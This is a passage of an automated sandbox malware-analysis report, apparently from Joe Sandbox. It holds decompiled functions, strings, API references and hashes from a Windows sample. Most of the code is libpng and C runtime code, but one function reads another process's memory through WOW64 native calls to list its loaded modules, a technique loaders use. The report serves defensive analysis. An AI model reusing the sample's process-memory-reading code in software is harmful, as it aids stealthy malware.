								 *(__ecx + 0x118) =  *(__ecx + 0x118) & 0x00000003;
								if(( *(__ecx + 0x118) & 0x00000003) != 2) {
									__eax = _a4;
									return L00428FD0(__ecx, _a4);
								}
								goto L34;
							case 5:
								__ecx = _a4;
								 *(__ecx + 0x118) =  *(__ecx + 0x118) & 0x00000001;
								if(( *(__ecx + 0x118) & 0x00000001) != 0) {
									L30:
									__ecx = _a4;
									return L00428FD0(_a4, _a4);
								}
								__eax = _a4;
								if( *((intOrPtr*)(_a4 + 0x100)) < 2) {
									goto L30;
								}
								goto L34;
							case 6:
								__edx = _a4;
								 *(__edx + 0x118) =  *(__edx + 0x118) & 0x00000001;
								if(( *(__edx + 0x118) & 0x00000001) == 0) {
									__ecx = _a4;
									return L00428FD0(_a4, _a4);
								}
								goto L34;
						}
					}
				}
				L34:
				_v8 =  *((intOrPtr*)(_a4 + 0x14f));
				_v16 =  *((intOrPtr*)(_a4 + 0x10c));
				_v6 =  *((intOrPtr*)(_a4 + 0x154));
				_v7 =  *((intOrPtr*)(_a4 + 0x151));
				_v5 = (_v7 & 0x000000ff) * (_v6 & 0x000000ff);
				if((_v5 & 0x000000ff) < 8) {
					_t68 =  &_v16; // 0x414035
					_v24 = (_v5 & 0x000000ff) *  *_t68 + 7 >> 3;
				} else {
					_t65 =  &_v16; // 0x414035
					_v24 = ((_v5 & 0x000000ff) >> 3) *  *_t65;
				}
				_v12 = _v24;
				_t73 =  &_a8; // 0x414035
				L00433F90( *((intOrPtr*)(_a4 + 0x124)) + 1,  *_t73, _v12);
				_t229 = _t228 + 0xc;
				if(( *(_a4 + 0x14c) & 0x000000ff) != 0 && ( *(_a4 + 0x14d) & 0x000000ff) < 6 && ( *(_a4 + 0x7c) & 0x00000002) != 0) {
					_t86 =  &_v16; // 0x414035
					E00429200(_t86,  *((intOrPtr*)(_a4 + 0x124)) + 1,  *(_a4 + 0x14d) & 0x000000ff);
					_t229 = _t229 + 0xc;
					if(_v16 == 0) {
						return L00428FD0(_a4, _a4);
					}
				}
				if( *(_a4 + 0x7c) != 0) {
					_t91 =  &_v16; // 0x414035
					E0042A520(_t91, _a4, _t91);
					_t229 = _t229 + 8;
				}
				if((_v5 & 0x000000ff) != ( *(_a4 + 0x152) & 0x000000ff) || (_v5 & 0x000000ff) != ( *(_a4 + 0x157) & 0x000000ff)) {
					E0041B170(_a4, "internal write transform logic error");
				}
				if(( *(_a4 + 0x250) & 0x00000004) != 0 && ( *(_a4 + 0x254) & 0x000000ff) == 0x40) {
					_t106 =  &_v16; // 0x414035
					E00413440(_t106,  *((intOrPtr*)(_a4 + 0x124)) + 1);
					_t229 = _t229 + 8;
				}
				if((_v8 & 0x000000ff) == 3 &&  *((intOrPtr*)(_a4 + 0x144)) >= 0) {
					_t110 =  &_v16; // 0x414035
					E004240E0(_a4, _t110);
					_t229 = _t229 + 8;
				}
				_t112 =  &_v16; // 0x414035
				_t137 = E00429570(_a4, _t112);
				if( *((intOrPtr*)(_a4 + 0x1c4)) != 0) {
					return  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c4))))(_a4,  *(_a4 + 0x118),  *(_a4 + 0x14d) & 0x000000ff);
				}
				return _t137;
			}

0x0041309a
0x00000000
0x00000000
0x004130ab
0x004130c7
0x004130d2
0x004130d2
0x004130db
0x004130e0
0x004130e0
0x004130ef
0x0041310e
0x00413115
0x0041311e
0x00000000
0x00413131
0x00000000
0x0041313c
0x00000000
0x00000000
0x00413149
0x00413152
0x00413155
0x00413163
0x00413163
0x00000000
0x0041316c
0x00413157
0x00413161
0x00000000
0x00000000
0x00000000
0x00000000
0x00413179
0x0041317c
0x00413182
0x00413188
0x0041318a
0x00000000
0x00413193
0x00000000
0x00000000
0x004131a0
0x004131a3
0x004131a9
0x004131ac
0x004131ba
0x004131ba
0x00000000
0x004131c3
0x004131ae
0x004131b8
0x00000000
0x00000000
0x00000000
0x00000000
0x004131cd
0x004131d6
0x004131dc
0x004131de
0x00000000
0x004131e7
0x00000000
0x00000000
0x004131f1
0x004131fa
0x004131fd
0x0041320b
0x0041320b
0x00000000
0x00413214
0x004131ff
0x00413209
0x00000000
0x00000000
0x00000000
0x00000000
0x0041321e
0x00413227
0x0041322a
0x0041322c
0x00000000
0x00413235
0x00000000
0x00000000
0x0041311e
0x00413115
0x0041323d
0x00413246
0x00413252
0x0041325e
0x0041326a
0x00413278
0x00413282
0x00413298
0x004132a2
0x00413284
0x0041328b
0x0041328f
0x0041328f
0x004132a8
0x004132af
0x004132c0
0x004132c5
0x004132d4
0x00413308
0x0041330c
0x00413311
0x00413318
0x00000000
0x00413323
0x00413318
0x00413332
0x00413334
0x0041333c
0x00413341
0x00413341
0x00413354
0x00413371
0x00413371
0x00413382
0x004133a0
0x004133a4
0x004133a9
0x004133a9
0x004133b3
0x004133c1
0x004133c9
0x004133ce
0x004133ce
0x004133d1
0x004133d9
0x004133eb
0x00000000
0x00413411
0x00413417

Strings

5@A, xrefs: 00413298, 004133D1, 004133C1, 004133A0, 00413334, 00413308, 0041328B, 0041330B, 00413337, 004133A3, 004133C4, 004133D4
internal write transform logic error, xrefs: 00413368
png_write_info was never called before png_write_row, xrefs: 004130C9
5@A, xrefs: 004132AF, 004132B2

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: 5@A$5@A$internal write transform logic error$png_write_info was never called before png_write_row
API String ID: 0-1576029765
Opcode ID: 577825802871872c47e255ebb98bbebd3abcba6c3d0398b7fd330c0b329e8b12
Instruction ID: 9bc2f54cd5692f88a77339a26f928d815424328625c9bf9bc1bd4a066db637c2
Opcode Fuzzy Hash: 577825802871872c47e255ebb98bbebd3abcba6c3d0398b7fd330c0b329e8b12
Instruction Fuzzy Hash: DFB1C775A04148ABCB04DF50C491AEE7B72AF85345F18C1AAE8594F346C739EFC2CB99

Uniqueness

Uniqueness Score: -1,00%

Function 00425F10, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 185COMMON

Download Yara Rule

Strings

png_set_keep_unknown_chunks: invalid keep, xrefs: 00425F2D
png_set_keep_unknown_chunks: too many chunks, xrefs: 00425FC5
png_set_keep_unknown_chunks: no chunk list, xrefs: 00425F7C
3333, xrefs: 00425FBD

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: 3333$png_set_keep_unknown_chunks: invalid keep$png_set_keep_unknown_chunks: no chunk list$png_set_keep_unknown_chunks: too many chunks
API String ID: 0-2943975347
Opcode ID: 198a7145dad8fba901b501586f085db362963c79c20363d23b7dc8bd57e1d7c0
Instruction ID: 473385329403d399c103d0db8ee13ebe1be32c41f1146bb82823c102fe1767d8
Opcode Fuzzy Hash: 198a7145dad8fba901b501586f085db362963c79c20363d23b7dc8bd57e1d7c0
Instruction Fuzzy Hash: 82813E74E00219EFCB04CF84D585BAEBBB1FF44309F65815AE809AB341D339AA91DF95

Uniqueness

Uniqueness Score: -1,00%

Function 00425AB0, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00425BFD
_memmove.LIBCMT ref: 00425C6A

Strings

png_set_sPLT: invalid sPLT, xrefs: 00425B74
too many sPLT chunks, xrefs: 00425B04
sPLT out of memory, xrefs: 00425CC2

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: png_set_sPLT: invalid sPLT$sPLT out of memory$too many sPLT chunks
API String ID: 4104443479-2314782589
Opcode ID: d9222680f55809b9b75f7c2e20928c66a871abf85fcf6d5b63388a87567d7bc6
Instruction ID: b1d16d721ba9ae5466a993be9dc8e12b152a2f14ce46354dee91b0d5af4fc3f1
Opcode Fuzzy Hash: d9222680f55809b9b75f7c2e20928c66a871abf85fcf6d5b63388a87567d7bc6
Instruction Fuzzy Hash: E6710AB4A00209EFCB04CF58D995AAEB7B1FF88304F54C19AE9199B345D735AE81CB94

Uniqueness

Uniqueness Score: -1,00%

Function 004022E3, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 168
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004022E3(intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v84;
				char _v92;
				void* __esi;
				_Unknown_base(*)()* _t81;
				intOrPtr* _t82;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t95;
				signed int* _t96;
				unsigned int _t103;
				intOrPtr _t105;
				signed int _t106;
				char* _t108;
				signed int _t110;
				signed int* _t112;
				char _t125;
				void* _t126;
				intOrPtr* _t128;
				intOrPtr _t129;
				unsigned int _t132;

				_v24 = _v24 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t110 = 0;
				_t81 = GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwWow64QueryInformationProcess64");
				if(_t81 == 0) {
					L23:
					_t82 = _a16;
					if(_t82 != 0) {
						 *_t82 = _t110;
					}
					if(_t110 <= _a12 && _t110 != 0) {
						_v24 = 1;
					}
					return _v24;
				}
				_push( &_v8);
				_push(0x30);
				_push( &_v92);
				_push(0);
				_push(_a4);
				if( *_t81() < 0) {
					goto L23;
				}
				_t85 = E00401671(0x200);
				_v20 = _t85;
				if(_t85 == 0) {
					goto L23;
				}
				_t126 = E00401671(0x100);
				if(_t126 == 0) {
					L21:
					E00401686(_v20);
					if(_t126 != 0) {
						E00401686(_t126);
					}
					goto L23;
				}
				_t89 = E00402268( &_v92,  &_v84, _a4, _t126, 0x28);
				_v8 = _t89;
				if(_t89 == 0) {
					goto L21;
				}
				_t12 = _t126 + 0x28; // 0x28
				_t14 = _t126 + 0x18; // 0x18
				_t128 = _t14;
				_t91 = E00402268( &_v92, _t128, _a4, _t12, 0x40);
				_v8 = _t91;
				if(_t91 == 0) {
					goto L21;
				}
				_t115 =  *(_t128 + 4);
				_t125 =  *((intOrPtr*)(_t126 + 0x38));
				_t129 =  *((intOrPtr*)(_t126 + 0x3c));
				_t93 =  *_t128 + 0x10;
				asm("adc ecx, ebx");
				_t112 =  &(_a8[2]);
				_v44 = _t93;
				_v40 = _t115;
				_v36 = _t125;
				_v32 = _t129;
				_v16 = 4;
				if(_t125 != _t93 || _t129 != _t115) {
					while(1) {
						_t25 = _t126 + 0x68; // 0x68
						_t95 = E00402268(_t115,  &_v36, _a4, _t25, 0x98);
						_v8 = _t95;
						if(_t95 == 0) {
							goto L18;
						}
						_v16 = _v16 + 0x120;
						_v36 =  *((intOrPtr*)(_t126 + 0x68));
						_v32 =  *((intOrPtr*)(_t126 + 0x6c));
						if(_v16 > _a12) {
							L16:
							if(_v36 != _v44 || _v32 != _v40) {
								continue;
							} else {
								goto L18;
							}
						}
						_t112[6] = _v12;
						_t112[5] =  *(_t126 + 0xd0);
						_t112[7] =  *((intOrPtr*)(_t126 + 0xd4));
						_t112[4] =  *(_t126 + 0xa8);
						_t103 = ( *(_t126 + 0xb0) & 0x0000ffff) >> 1;
						_t112[2] =  *(_t126 + 0x98);
						_t115 =  *(_t126 + 0x9c);
						_v28 = _t103;
						_t112[3] =  *(_t126 + 0x9c);
						if(_t103 >= 0x100) {
							L15:
							_t112 =  &(_t112[0x48]);
							_v12 = _v12 + 1;
							goto L16;
						}
						_t53 = _t126 + 0xb8; // 0xb8
						_t105 = E00402268(_t115, _t53, _a4, _v20,  *(_t126 + 0xb0) & 0x0000ffff);
						_v8 = _t105;
						if(_t105 == 0) {
							goto L15;
						}
						_t132 = _v28;
						_t106 = 0;
						if(_t132 <= 0) {
							L14:
							_t62 =  &(_t112[8]); // 0x18
							( &(_t112[8]))[_t132] = 0;
							_t108 = StrRChrA(_t62, 0, 0x5c);
							_t115 = 0xffe1 - _t112;
							_t112[7] =  &(_t108[0xffe1]);
							goto L15;
						} else {
							goto L13;
						}
						do {
							L13:
							 *((char*)(_t112 + _t106 + 0x20)) =  *((intOrPtr*)(_v20 + _t106 * 2));
							_t106 = _t106 + 1;
						} while (_t106 < _t132);
						goto L14;
					}
					goto L18;
				} else {
					L18:
					_t96 = _a8;
					if(_t96 != 0) {
						 *_t96 = _v12;
					}
					_t110 = _v16;
					goto L21;
				}
			}

0x004022e9
0x004022ed
0x004022f9
0x00402307
0x0040230f
0x004024e2
0x004024e2
0x004024e7
0x004024e9
0x004024e9
0x004024ee
0x004024f4
0x004024f4
0x00402502
0x00402502
0x00402318
0x00402319
0x0040231e
0x0040231f
0x00402320
0x00402327
0x00000000
0x00000000
0x00402332
0x00402339
0x0040233c
0x00000000
0x00000000
0x0040234c
0x00402350
0x004024d0
0x004024d3
0x004024da
0x004024dd
0x004024dd
0x00000000
0x004024da
0x0040235f
0x00402366
0x00402369
0x00000000
0x00000000
0x00402371
0x00402378
0x00402378
0x0040237b
0x00402382
0x00402385
0x00000000
0x00000000
0x0040238d
0x00402390
0x00402393
0x00402396
0x00402399
0x0040239e
0x004023a3
0x004023a6
0x004023a9
0x004023ac
0x004023af
0x004023b6
0x004023c0
0x004023c5
0x004023cf
0x004023d6
0x004023d9
0x00000000
0x00000000
0x004023e2
0x004023e9
0x004023ef
0x004023f8
0x004024a9
0x004024af
0x00000000
0x00000000
0x00000000
0x00000000
0x004024af
0x00402409
0x00402413
0x0040241d
0x00402427
0x00402430
0x00402437
0x0040243a
0x00402440
0x00402443
0x00402446
0x004024a0
0x004024a0
0x004024a6
0x00000000
0x004024a6
0x00402453
0x0040245c
0x00402463
0x00402466
0x00000000
0x00000000
0x00402468
0x0040246b
0x0040246f
0x00402480
0x00402484
0x00402488
0x0040248d
0x00402498
0x0040249c
0x00000000
0x00000000
0x00000000
0x00000000
0x00402471
0x00402471
0x00402477
0x0040247b
0x0040247c
0x00000000
0x00402471
0x00000000
0x004024c1
0x004024c1
0x004024c1
0x004024c6
0x004024cb
0x004024cb
0x004024cd
0x00000000
0x004024cd

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,00000318,00000000,00000000), ref: 004022FB
GetProcAddress.KERNEL32(00000000,ZwWow64QueryInformationProcess64), ref: 00402307

Part of subcall function 00401671: HeapAlloc.KERNEL32(00000000,00000000,00402F6B,00000003,00000000,00000000,00000000,?,?), ref: 0040167D

Part of subcall function 00402268: GetModuleHandleA.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00402364,00000000,00000000,00000028,00000100,00000200), ref: 00402289
Part of subcall function 00402268: GetProcAddress.KERNEL32(00000000,?,?,?,00402364,00000000,00000000,00000028,00000100,00000200), ref: 00402290

StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 0040248D

Strings

NTDLL.DLL, xrefs: 004022F4
ZwWow64QueryInformationProcess64, xrefs: 00402301

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$AllocHeap
String ID: NTDLL.DLL$ZwWow64QueryInformationProcess64
API String ID: 2261924782-3633144524
Opcode ID: 03b4e294052543a0aa5a30126ea71818808b2b424e56c6d3d12ebf1d8930c3df
Instruction ID: 5d81a48eff23b6f6b7f6dc859d801e3bc40d85f01b78da91aa48e8fc4b967bc6
Opcode Fuzzy Hash: 03b4e294052543a0aa5a30126ea71818808b2b424e56c6d3d12ebf1d8930c3df
Instruction Fuzzy Hash: 17614E71A00205ABDF14DFA5CA84BAEB7B4FF08304F10856AE908B73C1D778E954CBA4

Uniqueness

Uniqueness Score: -1,00%

Function 0040A670, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A670(void* __ebx, intOrPtr* _a4) {
				char _v8;
				char _v12;
				intOrPtr* _v16;
				char _t43;
				intOrPtr* _t45;
				void* _t53;
				intOrPtr* _t57;
				void* _t69;
				void* _t72;
				void* _t74;
				void* _t75;

				_t53 = __ebx;
				if( *_a4 != 0) {
					return E00412490(__eflags, _a4, "png_image_read: opaque pointer not NULL");
				}
				_v8 = E004097B0("1.6.35", _a4,  &M0041BC00,  &M0041BCB0);
				E004345E0(_a4, 0, 0x60);
				_t72 = _t69 + 0x1c;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				if(_v8 == 0) {
					L7:
					return E00412490(__eflags, _a4, "png_image_read: out of memory");
				}
				_t55 = _v8;
				_t43 = L0040EB50(_v8, _v8);
				_t74 = _t72 + 4;
				_v12 = _t43;
				if(_v12 == 0) {
					L6:
					E0040A420(_t53,  &_v8,  &_v8, 0, 0);
					_t72 = _t74 + 0xc;
					goto L7;
				}
				_t45 = E004245F0(_t55, _v8, 0x18);
				_t75 = _t74 + 8;
				_v16 = _t45;
				if(_v16 == 0) {
					L0040EBA0(_v8, _t55, _v8,  &_v12);
					_t74 = _t75 + 8;
					goto L6;
				}
				_t57 = _v16;
				 *_t57 = 0;
				 *((intOrPtr*)(_t57 + 4)) = 0;
				 *((intOrPtr*)(_t57 + 8)) = 0;
				 *((intOrPtr*)(_t57 + 0xc)) = 0;
				 *((intOrPtr*)(_t57 + 0x10)) = 0;
				 *((intOrPtr*)(_t57 + 0x14)) = 0;
				 *_v16 = _v8;
				 *((intOrPtr*)(_v16 + 4)) = _v12;
				 *(_v16 + 0x14) =  *(_v16 + 0x14) & 0xfffffffe;
				 *_a4 = _v16;
				return 1;
			}

0x0040a670
0x0040a67c
0x00000000
0x0040a776
0x0040a69d
0x0040a6a8
0x0040a6ad
0x0040a6b3
0x0040a6be
0x0040a755
0x00000000
0x0040a763
0x0040a6c4
0x0040a6c8
0x0040a6cd
0x0040a6d0
0x0040a6d7
0x0040a745
0x0040a74d
0x0040a752
0x00000000
0x0040a752
0x0040a6df
0x0040a6e4
0x0040a6e7
0x0040a6ee
0x0040a73d
0x0040a742
0x00000000
0x0040a742
0x0040a6f2
0x0040a6f5
0x0040a6f7
0x0040a6fa
0x0040a6fd
0x0040a700
0x0040a703
0x0040a70c
0x0040a714
0x0040a723
0x0040a72c
0x00000000

APIs

__aligned_recalloc.LIBCMTD ref: 0040A695
_memset.LIBCMT ref: 0040A6A8

Strings

1.6.35, xrefs: 0040A690
png_image_read: out of memory, xrefs: 0040A755
png_image_read: opaque pointer not NULL, xrefs: 0040A768

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __aligned_recalloc_memset
String ID: 1.6.35$png_image_read: opaque pointer not NULL$png_image_read: out of memory
API String ID: 3460390310-4077605682
Opcode ID: 3ebf1c0a05d30e81b5c3d1301670ff398dd7686c3e0b94fafb2ab9d903af1f4d
Instruction ID: f476572f738e5a10f0c1b8791a3f51b63e41dba3f698c93c44e903ae46230430
Opcode Fuzzy Hash: 3ebf1c0a05d30e81b5c3d1301670ff398dd7686c3e0b94fafb2ab9d903af1f4d
Instruction Fuzzy Hash: 37311079D00208EFDB04DF65D941B9DBBB0EB48304F24C1AAE908AB381E779DA51CB95

Uniqueness

Uniqueness Score: -1,00%

Function 00438420, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00438420(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v32;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				void* __ebp;
				char* _t26;
				char* _t33;
				char* _t39;
				char* _t41;
				char* _t42;
				intOrPtr* _t46;
				void* _t57;
				char* _t58;
				char* _t59;
				intOrPtr _t63;

				_t51 = __edx;
				_t57 = L0043CC27(__ebx, __edx);
				if(_t57 != 0) {
					_push(__ebx);
					__eflags =  *(_t57 + 0x24);
					if( *(_t57 + 0x24) != 0) {
						L7:
						_t58 =  *(_t57 + 0x24);
						_t26 = E0043C688(_t58, 0x86, E004383FA(_a4));
						__eflags = _t26;
						if(_t26 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00439530(0x86, _t51);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t46 = _v32;
							_v120 = 0x80000026;
							_v116 = 0;
							_v112 = 0;
							_v108 = 0;
							_v104 = 0;
							_t63 =  *_t46;
							_t59 =  *(_t46 + 0x18);
							__eflags = _t59 -  *[fs:0x0];
							if(_t59 ==  *[fs:0x0]) {
								L13:
								__eflags = _t59;
								if(__eflags == 0) {
									L19:
									E004420C5( *((intOrPtr*)(_t46 + 0x14)), _t63, 0);
									__eflags = _v32 - 1;
									asm("adc eax, 0x0");
									goto ( *((intOrPtr*)(_t46 + 0x14)));
								}
								_t13 = _t46 + 0x20; // 0x4384fe
								_t33 = E004420E7(__eflags);
								__eflags = _t33;
								if(_t33 == 0) {
									L18:
									E00442015(_t63, _t59,  *((intOrPtr*)(_t46 + 0x1c)));
									goto L19;
								}
								_t14 = _t46 + 0x20; // 0x74c00b24
								__eflags =  *_t14 - 0x56433230;
								if( *_t14 != 0x56433230) {
									goto L18;
								}
								_t15 = _t46 + 0x24; // 0xd0ff5312
								_t39 =  *_t15;
								__eflags = _t39;
								if(_t39 != 0) {
									 *_t39(_t46);
								}
								goto L19;
							}
							_push(_t46);
							_push(_t59);
							_push(0);
							_push( &_v120);
							_push(E004384DE);
							L0044C9E8();
							_t59 = _t59;
							_pop(_t46);
							goto L13;
						}
						_t41 = _t58;
						L5:
						return _t41;
					}
					_t42 = E004374B4(0x86, 1);
					 *(_t57 + 0x24) = _t42;
					__eflags = _t42;
					if(_t42 != 0) {
						goto L7;
					}
					_t41 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					goto L5;
				}
				return "Visual C++ CRT: Not enough memory to complete call to strerror.";
			}

0x00438420
0x00438429
0x0043842d
0x00438436
0x0043843f
0x00438442
0x0043845f
0x00438462
0x0043846d
0x00438475
0x00438477
0x0043847d
0x0043847e
0x0043847f
0x00438480
0x00438481
0x00438482
0x00438487
0x00438488
0x00438489
0x0043848a
0x0043848b
0x0043848c
0x0043848d
0x0043848e
0x0043848f
0x00438496
0x0043849a
0x004384a1
0x004384a8
0x004384af
0x004384b6
0x004384c0
0x004384c2
0x004384c5
0x004384cc
0x004384e0
0x004384e0
0x004384e3
0x00438515
0x0043851a
0x0043852e
0x00438531
0x0043853a
0x0043853a
0x004384e5
0x004384e9
0x004384ee
0x004384f0
0x00438508
0x0043850d
0x00000000
0x00438512
0x004384f2
0x004384f5
0x004384fa
0x00000000
0x00000000
0x004384fc
0x004384ff
0x004384ff
0x00438501
0x00438504
0x00438504
0x00000000
0x00438501
0x004384ce
0x004384cf
0x004384d0
0x004384d2
0x004384d3
0x004384d9
0x004384de
0x004384df
0x00000000
0x004384df
0x00438479
0x0043845a
0x00000000
0x0043845b
0x00438447
0x0043844e
0x00438451
0x00438453
0x00000000
0x00000000
0x00438455
0x00000000
0x00438455
0x00000000

APIs

__getptd_noexit.LIBCMT ref: 00438424

Part of subcall function 0043CC27: GetLastError.KERNEL32(?,?,00437D6F,004404B3,00000000,?,004374C8,?,?,00000000,?,?,?,0043CD81,00000001,000003BC), ref: 0043CC29
Part of subcall function 0043CC27: __calloc_crt.LIBCMT ref: 0043CC4A
Part of subcall function 0043CC27: GetCurrentThreadId.KERNEL32(00437D6F,004404B3,00000000,?,004374C8,?,?,00000000,?,?,?,0043CD81,00000001,000003BC,?,00435CDC), ref: 0043CC73
Part of subcall function 0043CC27: SetLastError.KERNEL32(00000000,?,00437D6F,004404B3,00000000,?,004374C8,?,?,00000000,?,?,?,0043CD81,00000001,000003BC), ref: 0043CC8B

__calloc_crt.LIBCMT ref: 00438447
__get_sys_err_msg.LIBCMT ref: 00438465
__invoke_watson.LIBCMT ref: 00438482

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0043842F, 00438455

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__invoke_watson
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2164971522-798102604
Opcode ID: 72b5777a670311b52964a53ee5e40625def084d86b78b4ac3cf904778f4d6e1b
Instruction ID: c5b4f6d514253d53468f0cb55b1c55fce47f1901b435cc5948dc1939d7a8d764
Opcode Fuzzy Hash: 72b5777a670311b52964a53ee5e40625def084d86b78b4ac3cf904778f4d6e1b
Instruction Fuzzy Hash: C1F0F67210071267D622212A5C4296FB28CDB2C768F10642FFE4596602FE1DDC00429D

Uniqueness

Uniqueness Score: -1,00%

Function 00446314, Relevance: 7.8, APIs: 5, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00446314(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v168;
				signed int _v180;
				char _v252;
				char _v420;
				signed int _v444;
				void* __esi;
				signed int _t68;
				signed int _t72;
				signed int _t74;
				signed int _t83;
				signed int _t85;
				void* _t86;
				signed int _t89;
				signed int _t91;
				signed int _t95;
				signed int _t97;
				void* _t103;
				signed int _t106;
				signed int _t112;
				signed int _t113;
				signed int _t115;
				signed int _t116;
				signed int _t120;
				void* _t121;
				signed int _t122;
				void* _t123;
				void* _t124;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				void* _t135;
				signed int _t138;
				signed int _t140;
				intOrPtr* _t142;
				void* _t143;
				void* _t177;
				void* _t179;
				signed int _t182;
				void* _t184;
				intOrPtr _t186;
				void* _t187;
				intOrPtr* _t188;
				void* _t189;
				signed int _t190;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				void* _t199;
				void* _t201;
				signed int _t202;

				_t180 = __edi;
				_t179 = __edx;
				_t194 = _t197;
				_t68 =  *0x469acc; // 0x6f159cef
				_v8 = _t68 ^ _t194;
				_push(__ebx);
				_t186 = _a4;
				_v140 = _t186;
				_t4 = L0043CC0F(__edi, __eflags) + 0x9c; // 0x9c
				_t142 = _t4;
				asm("sbb ecx, ecx");
				_t72 = E004381D2(_t186, ( ~( *(_t142 + 0x14)) & 0xfffff005) + 0x1002,  &_v136, 0x40);
				_t199 = _t197 - 0x88 + 0x10;
				if(_t72 != 0) {
					_push(__edi);
					_t74 = E00441969(_t142, _t186,  *((intOrPtr*)(_t142 + 4)),  &_v136);
					__eflags = _t74;
					if(_t74 != 0) {
						L15:
						__eflags = ( *(_t142 + 8) & 0x00000300) - 0x300;
						if(( *(_t142 + 8) & 0x00000300) == 0x300) {
							L22:
							_t80 =  !( *(_t142 + 8) >> 2) & 0x00000001;
							__eflags =  !( *(_t142 + 8) >> 2) & 0x00000001;
							goto L23;
						} else {
							asm("sbb ecx, ecx");
							_t83 = E004381D2(_t186, ( ~( *(_t142 + 0x10)) & 0xfffff002) + 0x1001,  &_v136, 0x80);
							_t201 = _t199 + 0x10;
							__eflags = _t83;
							if(_t83 != 0) {
